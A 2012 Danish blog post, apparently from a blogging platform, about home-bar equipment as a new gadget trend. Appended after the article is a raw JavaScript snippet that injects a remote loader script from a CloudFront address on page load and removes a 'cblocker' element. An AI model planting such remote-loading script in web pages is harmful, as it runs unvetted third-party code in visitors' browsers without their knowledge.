Smartlog v3 » Tips, Guides & Informationer » Er barudstyr den nye gadget?
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Er barudstyr den nye gadget?

16. Aug 2012 12:26, webmayn

Man er efterhånden lidt af en særling, hvis man ikke ejer en smart phone, og hvis du ikke har en bærbar computer – gerne med et lysende æble bag på skærmen – så er du helt bagud af dansen. Teknologi har længe præget gadget-miljøet som værende de ultimative dimser, man kan investere i.

Men teknologi er også efterhånden blevet allemandseje, og derfor er en gruppe gadget-entusiaster begyndt at interessere sig for en helt anden form for specialudstyr, nemlig lir til hjemmebaren. For når man har det store trådløse anlæg på plads til at imponere med til festen, hvad er så det næste sted, man kan imponere? Det er selvfølgelig med fancy barudstyr, som de fleste køber på nettet på sider som denne .

Hvem kunne ikke tænke sig en jigger, en shaker eller en flairflaske? En jigger er for resten en slags målebæger til afmåling af alkohol, og flair er noget med at kaste rundt med sprutflaskerne inden man bruger dem.

Jeg er vist ikke selv helt klar til at kaste rundt med flaskerne i hjemmebaren, men måske kunne jeg godt overtale mig selv – og min bankdame – til, at det var en god idé at investere i nogle fancy drinksglas. Så kan jeg også få afløb for min indre bartender.

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede